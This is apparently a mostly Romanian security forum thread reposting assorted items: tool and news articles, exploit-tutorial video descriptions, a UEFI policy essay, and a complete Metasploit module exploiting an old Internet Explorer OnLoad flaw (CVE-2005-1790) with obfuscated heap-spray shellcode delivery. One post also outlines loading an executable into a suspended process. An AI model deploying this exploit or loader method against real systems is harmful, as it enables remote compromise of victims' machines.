Nytro

Da, eu vad destul de des Linux pe niste Flash-uri de 64 MB si procesoare ARM.

Introduction to Network Security Toolkit (NST) The Network Security Toolkit (NST) is a ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. The main intent of developing this toolkit was to provide the network security administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 100 Security Tools by INSECURE.ORG are available in the toolkit. Some of the tools available in this live are: Ntop, wireshark, nmap with the vizualization tool ZenMap and kismet. Many tasks that can be performed within NST are available through a web interface called NST WUI. Among the tools that can be used through this interface are nmap with the vizualization tool ZenMap, ntop, a session manager for VNC, a minicom-based terminal server, serial port monitoring, and WPA PSK management. You can read some of my articles about Nmap and Ntop following the links, for Nmap you got also Zenmap. Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform free and open source application which aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. On NST are also available Nagios and Argus, 2 software that can be used for network monitoring, you can check the status of various services, like web server, pop/imap mails erver or other services that in general you can test directly with a network connection. Another feature nice, and really “scenic” is that NST includes visualization of ntop, wireshark, traceroute and kismet data by geocoding the host addresses and displaying them via Google Earth. For this NST use a custom tool: nstgeolocate — Geolocate hosts obtained from an ‘ntop’ session or Geolocate IPv4 Address conversations from a network packet capture file on a Mercator World Map projection or Global imagery. There is also a browser-based packet capture and protocol analysis system capable of monitoring up to four network interfaces using Wireshark, as well as a Snort-based intrusion detection system with a “collector” backend that stores incidents in a MySQL database. For web developers, there is also a JavaScript console with a built-in object library with functions that aid the development of dynamic web pages. A great guide on what is available on the live distro and how to use each tools it’s present of the official wiki Conclusions This live CD it’s really filled with security tools and utility, so it could be really useful to set up in few minutes a location where you can do a security audit of a network or some hosts. It’s also really interesting the option to put it on a virtual machine, on the wiki there is a good how to on how to put NST on Virtualbox. So in few words: try and use it for your security audit, you’ll be satisfied for sure. Sursa: http://linuxaria.com/article/introduction-to-network-security-toolkit-nst?lang=en

Exploiting embedded systems Overview: - Embedded systems basics - Real Time OS - The ARM architecture - The JTAG interface - The UART interface .............................. Download: http://www.blackhat.com/presentations/bh-europe-06/bh-eu-06-Jack.pdf E o prezentare, dar se pot observa conceptele.

Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability', 'Description' => %q{ This bug is triggered when the browser handles a JavaScript 'onLoad' handler in conjunction with an improperly initialized 'window()' JavaScript function. This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address. We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes. Also, please note that Internet Explorer must allow popups in order to continue exploitation. }, 'License' => MSF_LICENSE, 'Author' => [ 'Benjamin Tobias Franz', # Discovery 'Stuart Pearson', # Proof of Concept 'Sam Sharps' # Metasploit port ], 'References' => [ ['MSB', 'MS05-054'], ['CVE', '2005-1790'], ['OSVDB', '17094'], ['URL', 'http://www.securityfocus.com/bid/13799/info'], ['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1000, 'BadChars' => "\x00", 'Compat' => { 'ConnectionType' => '-find', }, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Internet Explorer 6 on Windows XP', { 'iframes' => 4 } ], [ 'Internet Explorer 6 Windows 2000', { 'iframes' => 8 } ], ], 'DisclosureDate' => 'Nov 21 2005', 'DefaultTarget' => 0)) end def exploit @var_redir = rand_text_alpha(rand(100)+1) super end def auto_target(cli, request) mytarget = nil agent = request.headers['User-Agent'] print_status("Checking user agent: #{agent}") if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/) mytarget = targets[0] # IE6 on XP elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/) mytarget = targets[1] # IE6 on 2000 else print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}") end mytarget end def on_request_uri(cli, request) mytarget = auto_target(cli, request) var_title = rand_text_alpha(rand(100) + 1) func_main = rand_text_alpha(rand(100) + 1) heapspray = ::Rex::Exploitation::JSObfu.new %Q| function heapspray() { shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}'); var bigblock = unescape("#{Rex::Text.to_unescape(make_nops(4))}"); var headersize = 20; var slackspace = headersize + shellcode.length; while (bigblock.length < slackspace) bigblock += bigblock; var fillblock = bigblock.substring(0,slackspace); var block = bigblock.substring(0,bigblock.length - slackspace); while (block.length + slackspace < 0x40000) block = block + block + fillblock; var memory = new Array(); for (i = 0; i < 250; i++){ memory[i] = block + shellcode } var ret = ""; var fillmem = ""; for (i = 0; i < 500; i++) ret += unescape("%u0F0F%u0F0F"); for (i = 0; i < 200; i++) fillmem += ret; prompt(fillmem, ""); } | heapspray.obfuscate nofunc = ::Rex::Exploitation::JSObfu.new %Q| if (document.location.href.indexOf("#{@var_redir}") == -1) { var counter = 0; top.consoleRef = open('','BlankWindow', 'width=100,height=100' +',menubar=0' +',toolbar=1' +',status=0' +',scrollbars=0' +',left=1' +',top=1' +',resizable=1') self.focus() for (counter = 0; counter < #{mytarget['iframes']}; counter++) { top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>'); } document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">"); } else { #{heapspray.sym('heapspray')}(); } | nofunc.obfuscate main = %Q| function #{func_main}() { document.write("<TITLE>#{var_title}</TITLE>"); document.write("<body onload=window();>"); window.location.reload(); } | html = %Q| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN"> <html> <head> <meta http-equiv="Content-Language" content="en-gb"> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <script> #{nofunc} #{heapspray} #{main} </script> </head> <body> </body> </html> | print_status("Sending #{self.name} to client #{cli.peerhost}") # Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' }) # Handle the payload handler(cli) end end Sursa: Microsoft Internet Explorer JavaScript OnLoad Handler Code Execution | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

[h=1]OpenVSP[/h] NASA Open Source Parametric Geometry OpenVSP is a parametric aircraft geometry tool. OpenVSP allows the user to create a 3D model of an aircraft defined by common engineering parameters. This model can be processed into formats suitable for engineering analysis. The predecessors to OpenVSP have been developed by J.R. Gloudemans and others for NASA since the early 1990's. On January 10 2012, OpenVSP was released as an open source project under the NASA Open Source Agreement (NOSA) version 1.3. We are still in the process of setting up all of the things which allow an open source project to work. In the meantime, get OpenVSP for yourself from the links below. OpenVSP 2.0 for Windows OpenVSP 2.0 for Mac OS X OpenVSP 2.0 Community Edition Source Code Interesanta ideea. Si ce cod sursa "urat": lcsfit_(&c__201, xt, yt, &c_true, "B", &c__1, &xtp, &ym, &ym, (ftnlen)1); xo = xt[0]; xl[0] = xt[199]; tr = ym * 2.f / (xl[0] - xo); rat = toc / tr; sf = rat; if (toc > e && (r__1 = rat - 1.f, dabs(r__1)) > 1e-4f && it <= 10) { goto L400; } Sursa: OpenVSP

Daca esti bun nu conteaza domeniul, o sa iti gasesti de munca. E mai greu la inceput, dar usor-usor o sa gasesti ceva frumos, care sa iti placa si care sa iti aduca venituri substantiale. Pe partea de PHP se cauta, dar sunt multi si trebuie sa fii bun, Java inca e cautat, dar nu stiu cat timp o sa mai fie, posturi de administrator nu sunt foarte multe, dar cred ca se castiga bine, iar C++ cred intotdeauna va fi cautat. Vezi si tu pe bestjobs/ejobs ce se cauta, cauta in functie de experienta ceruta si vezi ce criterii se cer la fiecare. O sa "pierzi" doua zile cu asta, dar apoi vei stii exact ce ai de facut.

A.c.a.b.

Stai asa sa ghicesc in globul de cristal care e problema cu contul tau...

Varianta binara cred ca poate fi mai mica decat dimensiunea sursei. La Kaspersky stiu ca erau mai multe produse, prin 2007, sau cand aparuse o sursa, pe care o am si eu. Insa aveti careva coduri sursa de la Norton sau McAfee? Le-ati gasit pe undeva? Daca gasiti sa postati aici va rog, sunt si oameni interesati, am gasit chestii interesante in codul de la Kaspersky. Edit: http://uk.reuters.com/article/2012/01/14/uk-symantec-hacker-idUKTRE80D09T20120114

Inca am fani desi nu mai am timp sa dau banuri si avertismente ca in tinerete.

Citeste mai intai despre structura executabilelor: Portable Executable - Wikipedia, the free encyclopedia Peering Inside the PE: A Tour of the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format Inside Windows: An In-Depth Look into the Win32 Portable Executable File Format, Part 2 Microsoft PE and COFF Specification Ai putea sa te uiti si peste: The .NET File Format - CodeProject® Problema e ca tu vrei exemplu pentru .NET... Nu prea am vazut exemple in .NET, cauta la sectiunea Programare, o sa gasesti multe lucruri utile, dar de .NET mai putine. Trebuie creat un nou proces (suspendat). Aloci spatiu, si incarci executabilul (la ImageBase, dimensiunea specificata de OptionalHeader, adica SizeOfimage). Trebuie insa sa fii atent sa incarci fiecare sectiune, aliniata la dimensiunea specificata in structura executabilului, dupa ce scrii headerele (primul lucru pe care il faci). Si cu asta l-ai incarcat in memorie, nu e extrem de complicat. Apoi mai trebuie doar sa cedezi executia Entrypoint-ului. WinAPI iti ofera tot ce ai nevoie, poti face identic si in .NET cu dllimport, dar nu are rost. Nu stiu daca .NET are clase si functii speciale pentru astfel de actiuni, ar cam trebui sa fie.

Cred ca ai mai instalat o data libnet si nu libnet-dev. root@bt:~/libnet-1.1.5# ./configure Si nu root@bt:~/libnet-dev-1.1.5# ./configureNu stiu, ar trebui sa mearga.

Tu ai citit ce am scris eu? configure: error: libnet0 (dev) is required for this program

Problema e ca iti trebuie libnet development headers (de la development provine acel "dev" de acolo, libnet probabil era deja instalata). Cred ca asta e: libnet-dev | Free software downloads at SourceForge.net

Astea sunt arhicunoscute, sunt multe alte "comenzi"... Deschide executabilul de la messenger cu un Hex Editor si uita-te pe acolo.

In multe locuri apare de la dracia asta de iconita: http://mystatus.skype.com/smallicon/sample.skype90 O sa reparam azi-maine.

Ceva cu mai mult de 10 randuri nu sunteti in stare sa cititi si sa va dati cu parerea.

Intro To Exploits - Part 1 http://www.youtube.com/watch?v=NzGB-8Sntqc&feature=player_embedded Description: **This video and Part 2 Segment 1 are more lecture based videos** What's in this video? -Coding Practices -Defining Functions of Interest -Introduction To Shellcode I recommend watching in full-screen due to quality issues. This is part 1 of 5. More to come over the next few weeks. Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 1 Intro To Exploits - Part 2 (Shellcode) http://www.youtube.com/watch?v=-QlaRVn1K1o&feature=player_embedded Description: I recommend watching in full-screen due to quality issues. This is the first of two videos for part 2 of 5. The topic of discussion for this video is an expanded explanation of shellcode. -How shellcode is executed -Architecture types -Assembly/hex examples Also, sorry about how I was talking in the video, I'm not a strong speaker. Sursa: Intro To Exploits - Part 2 (Shellcode) Intro To Exploits - Part 2 (Shellcode Cont.) http://www.youtube.com/watch?v=m-AxrZxvu8o&feature=player_embedded Description: ****This video demonstrates the concepts of how shellcode works**** I recommend watching in full-screen due to quality issues. This is the second of two videos for part 2 of 5. This video expands even more on the previous video, and we end Part 2 with a visual example of how shellcode operates. -Different purposes of shellcode -Security evasion -Visual example of shellcode in action (bind and reverse shells) Sursa: Intro To Exploits - Part 2 (Shellcode Cont.) Intro To Exploits - Part 3 (Fuzzing) http://www.youtube.com/watch?v=v3wOMXZykrE&feature=player_embedded Description: The topic of this video is fuzzing. At the end of Part 3, we fuzz a simple tcp echo server. -Types of Fuzzers -How to know if a fuzzer was successful -Finding buffer size I hope you learned a lot as fuzzing is very undocumented outside of the security industry, and the technique itself is more used for auditing many programs with a generic testing tool. The downside of fuzzing is that it is very limited to what it can test, and how deep into a program it can test. Fuzzing is more for an entry point stress test, than it would be for full-on code auditing. Sursa: Intro To Exploits - Part 3 (Fuzzing) Intro To Exploits - Part 4 (Reverse Engineering) http://www.youtube.com/watch?v=kMWc1PiKWUQ&feature=player_embedded Description: ****Topic for the video is Reverse Engineering**** This video covers the basics of disassembling/reverse engineering. This is a great video, as I show you how to explore different functions within gdb. This is an awesome tactic for determining what a program might be able to do. -Exploring the CPU -Differentiating functions from other stack procedures -Finding functions and disassembling them -Finding return addresses Reverse Engineering is a very broad category, and in its own right deserves its own video series. The steps I go through in this video are more for mapping out a program, rather than editing asm code to change execution flow. Sorry for the pause half way through the video. I rage-quited half way through filming it. Sursa: Intro To Exploits - Part 4 (Reverse Engineering) Intro To Exploits - Part 5 (Scenario) http://www.youtube.com/watch?v=5iUaq_H6wf8&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended as a solution to the IO wargame.*** What's in this video? In this video, we put together all of the information we have learned from the previous videos, and apply it to a practical (but very unlikely) buffer overflow situation. -On the fly exploitation (IO smashthestack level 5) Sursa: Intro To Exploits - Part 5 (Scenario) [h=4]Intro To Exploits - Part 5 (Scenario Cont.)[/h] http://www.youtube.com/watch?v=NzD67lD9OQU&feature=player_embedded Description: ***This video is intended for learning purposes only. In no way, shape, or form, is the sole purpose of this video intended to be used as a solution to the IO wargame.*** This video concludes the previous video, and the series. I hope I have helped new people learn a lot, and refresh the memories of the more seasoned folks. Thank you for watching! Sursa: http://www.securitytube.net/video/2649

[h=4]Cracking Hashes From A Meterpreter Session With Hashcat[/h] Description: Cracking Hashes From a Meterpreter Session with Hashcat , FOLLOW @sL0ps Sursa: Cracking Hashes From A Meterpreter Session With Hashcat

[h=4]Shellcode2Exe Shellcode Analysis[/h] http://www.youtube.com/watch?v=FTDZyYt7Fqk&feature=player_embedded Description: Converting shellcode into an executable is a simple analysis technique that allows you to use your favorite debugger to analyze the code at run time. This video describes the input and output formats supported by the Shellcode2Exe tool. Sursa: Shellcode2Exe Shellcode Analysis

[h=4]Scdbg - Shellcode Analysis[/h] Description: This video covers basic use of the scdbg tool to analyze several types of shellcode. scdbg is a tool written around the libemu library which runs shellcode in an emulated environment and displays all of the Windows API called during execution. scdbg also includes an integrated debug shell and complex options such as a report mode which tell you intimate details about how the shellcode was constructed. scdbg is open source and freely available. Versions are available for both Windows and Linux. Homepage: RE Corner Sursa: Scdbg - Shellcode Analysis

[h=3]New Generic Top-Level Domains (gTLDs) out for Sale[/h] Published: 2012-01-13, Last Updated: 2012-01-13 15:44:20 UTC by Guy Bruneau (Version: 1) Yesterday ICANN started accepting applications for new generic top-level domains (gTLDs). "The world of .com, .gov, .org and 19 other gTLDs will soon be expanded to include all types of words in many different languages. For the first time generic TLDs can include words in non-Latin languages, such as Cyrillic, Chinese or Arabic." [1] Last month, the US Federal Trade Commission indicated it has concerns with this change, they are concerned that consumer protection safeguard against bad actors that could lead to potential risk of abuse through existing scams such as phishing sites. [2] Do you see these changes have a potential for concern and abuse or just business as usual? [1] ICANN | New gTLDs Update: Applications Accepted Today; New Guidebook Posted; Financial Assistance for Qualifying Applicants [2] http://www.ftc.gov/os/closings/publicltrs/111216letter-to-icann.pdf [3] Home | ICANN New gTLDs ----------- Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu Sursa: ISC Diary | New Generic Top-Level Domains (gTLDs) out for Sale

[h=1]Microsoft confirms UEFI fears, locks down ARM devices[/h] [h=3]By Aaron Williamson | January 12, 2012[/h] At the beginning of December, we warned the Copyright Office that operating system vendors would use UEFI secure boot anticompetitively, by colluding with hardware partners to exclude alternative operating systems. As Glyn Moody points out, Microsoft has wasted no time in revising its Windows Hardware Certification Requirements to effectively ban most alternative operating systems on ARM-based devices that ship with Windows 8. The Certification Requirements define (on page 116) a "custom" secure boot mode, in which a physically present user can add signatures for alternative operating systems to the system's signature database, allowing the system to boot those operating systems. But for ARM devices, Custom Mode is prohibited: "On an ARM system, it is forbidden to enable Custom Mode. Only Standard Mode may be enable." [sic] Nor will users have the choice to simply disable secure boot, as they will on non-ARM systems: "Disabling Secure [boot] MUST NOT be possible on ARM systems." [sic] Between these two requirements, any ARM device that ships with Windows 8 will never run another operating system, unless it is signed with a preloaded key or a security exploit is found that enables users to circumvent secure boot. While UEFI secure boot is ostensibly about protecting user security, these non-standard restrictions have nothing to do with security. For non-ARM systems, Microsoft requires that Custom Mode be enabled—a perverse demand if Custom Mode is a security threat. But the ARM market is different for Microsoft in three important respects: Microsoft's hardware partners are different for ARM. ARM is of interest to Microsoft primarily for one reason: all of the handsets running the Windows Phone operating system are ARM-based. By contrast, Intel rules the PC world. There, Microsoft's secure boot requirements—which allow users to add signatures in Custom Mode or disable secure boot entirely—track very closely to the recommendations of the UEFI Forum, of which Intel is a founding member. Microsoft doesn't need to support legacy Windows versions on ARM. If Microsoft locked unsigned operating systems out of new PCs, it would risk angering its own customers who prefer Windows XP or Windows 7 (or, hypothetically, Vista). With no legacy versions to support on ARM, Microsoft is eager to lock users out. Microsoft doesn't control sufficient market share on mobile devices to raise antitrust concerns. While Microsoft doesn't command quite the monopoly on PCs that it did in 1998, when it was prosecuted for antitrust violations, it still controls around 90% of the PC operating system market—enough to be concerned that banning non-Windows operating systems from Windows 8 PCs will bring regulators knocking. Its tiny stake in the mobile market may not be a business strategy, but for now it may provide a buffer for its anticompetitive behavior there. (However, as ARM-based "ultrabooks" gain market share, this may change.) The new policy betrays the cynicism of Microsoft's initial response to concerns over Windows 8's secure boot requirement. When kernel hacker Matthew Garrett expressed his concern that PCs shipped with Windows 8 might prevent the installation of GNU/Linux and other free operating systems, Microsoft's Tony Mangefeste replied, "Microsoft’s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves." It is clear now that opportunism, not philosophy, is guiding Microsoft's secure boot policy. Before this week, this policy might have concerned only Windows Phone customers. But just yesterday, Qualcomm announced plans to produce Windows 8 tablets and ultrabook-style laptops built around its ARM-based Snapdragon processors. Unless Microsoft changes its policy, these may be the first PCs ever produced that can never run anything but Windows, no matter how Qualcomm feels about limiting its customers' choices. SFLC predicted in our comments to the Copyright Office that misuse of UEFI secure boot would bring such restrictions, already common on smartphones, to PCs. Between Microsoft's new ARM secure boot policy and Qualcomm's announcement, this worst-case scenario is beginning to look inevitable. Sursa: Microsoft confirms UEFI fears, locks down ARM devices - SFLC Blog - Software Freedom Law Center

[h=4]Backtrack 5 R1 , Metasploit And Stolen Tokens In Active Directory (Ad) Domain[/h] Description: Backtrack 5 R1 , Metasploit and Stolen Tokens in Active Directory (AD) Domain Special tnx (vivek) , (DM) Sursa: Backtrack 5 R1 , Metasploit And Stolen Tokens In Active Directory (Ad) Domain

[h=4]Iphone Forensics - On Ios 5[/h] Description: iPhone Forensics goal is to extract data and artifacts from iPhone without altering the information on the device. This video explains the technical procedure and the challenges involved in extracting data from the live iPhone. iPhone Forensics | InfoSec Institute – IT Training and Information Security Resources Sursa: Iphone Forensics - On Ios 5